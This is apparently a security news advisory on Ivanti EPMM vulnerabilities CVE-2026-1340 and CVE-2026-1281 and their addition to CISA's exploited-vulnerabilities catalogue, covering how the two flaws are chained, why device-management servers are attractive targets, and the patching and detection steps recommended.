๐ŸŒ Network

CISA Adds Ivanti EPMM CVE-2026-1340 to KEV โ€” Federal Patch Deadline Today

CISA has added CVE-2026-1340, a critical unauthenticated remote code execution flaw in Ivanti Endpoint Manager Mobile, to the Known Exploited Vulnerabilities catalogue with a federal agency deadline of 11 April. The vulnerability chains with CVE-2026-1281 to enable full appliance takeover and has been actively exploited since January 2026. All organisations running Ivanti EPMM on-premises must patch immediately.

4 min read
#ivanti#epmm#mdm#rce#cisa-kev#unauthenticated#code-injection#cve-2026-1340#cve-2026-1281

The Vulnerability Chain

Ivanti Endpoint Manager Mobile (EPMM) โ€” the enterprise mobile device management platform formerly known as MobileIron Core โ€” is affected by two critical unauthenticated remote code execution vulnerabilities that have been actively exploited as zero-days since January 2026.

CVE-2026-1281 (CVSS 9.8): A code injection flaw in legacy bash scripts used by EPMMโ€™s Apache web server to handle URL rewriting. Attackers can send crafted HTTP requests that trigger arbitrary command execution without any authentication.

CVE-2026-1340 (CVSS 9.8): A code injection vulnerability in EPMMโ€™s Android File Transfer mechanism. Like CVE-2026-1281, exploitation requires no credentials and no user interaction. CISA added CVE-2026-1340 to the Known Exploited Vulnerabilities catalogue on 8 April 2026, giving all US Federal Civilian Executive Branch agencies until 11 April to apply patches โ€” a four-day emergency window reflecting the severity of active exploitation.

The two vulnerabilities are frequently chained: CVE-2026-1281 provides the initial foothold and CVE-2026-1340 extends attacker capability on the compromised appliance.

Exploitation Activity

Unit 42 researchers documented widespread and largely automated exploitation activity against both vulnerabilities beginning shortly after Ivanti disclosed them in January 2026. The attack pattern is consistent:

  1. Unauthenticated attacker sends a crafted HTTP request to the EPMM web interface
  2. Code injection achieves execution on the EPMM appliance under the Apache service account
  3. Second-stage payload is downloaded โ€” typically a web shell, cryptominer, or persistent backdoor
  4. Attacker establishes persistent access and conducts lateral movement or data collection

Because EPMM is a mobile device management platform, a compromised appliance provides access to:

  • Full device inventory, configuration profiles, and enrolled device certificates
  • Push notification infrastructure that can be abused to issue commands to managed devices
  • Network credentials and VPN configurations distributed to mobile devices
  • Potentially sensitive data synchronised through the MDM platform

Why MDM Platforms Are High-Value Targets

Ivanti EPMM is deployed by thousands of enterprises, government agencies, and educational institutions worldwide to manage smartphones, tablets, and laptops. A compromise of the MDM appliance is equivalent to compromising the management plane for an organisationโ€™s entire mobile fleet โ€” an attacker who controls EPMM can see every device, its configuration, and in many implementations push malicious profiles or certificates to enrolled devices.

This is not Ivantiโ€™s first significant EPMM vulnerability under active exploitation. The platform was also targeted via CVE-2023-35078 and CVE-2023-35082 in 2023, demonstrating sustained attacker interest in MDM infrastructure as a high-value pivot point.

Affected Versions and Patching

Both vulnerabilities affect all supported on-premises EPMM major version lines through 12.7.x. Ivanti has released patch RPMs for all supported branches. A permanent fix is included in version 12.8.0.0.

Patching is straightforward and requires no downtime per Ivantiโ€™s advisory โ€” the fix can be applied as a live update without service interruption, removing any operational justification for delay.

Immediate (today):

  1. Identify all EPMM instances in your environment โ€” including those managed by third-party IT providers or hosted at branch offices
  2. Apply the patch appropriate for your version branch; verify the installed RPM version matches Ivantiโ€™s advisory post-patch
  3. Restrict EPMM admin interface access to management networks only โ€” remove any direct internet exposure of the admin panel if it exists
  4. Review EPMM logs for the past 90 days for unusual HTTP requests, unexpected outbound connections, and anomalous device command issuance

Detection:

  • Alert on unexpected processes spawned by the Apache service account on EPMM
  • Monitor for web shell indicators: unusual files in web-accessible directories, HTTP POST requests returning command output
  • Review device configuration push history for any profiles or certificates issued outside of normal change management

If you believe you are already compromised:

Treat the EPMM appliance as fully compromised. Isolate it from the network, preserve forensic images for incident analysis, and begin rotating all credentials and certificates that have been distributed through the platform. Engage your incident response team immediately โ€” the combination of device management access and credential visibility makes this a potentially severe breach scenario.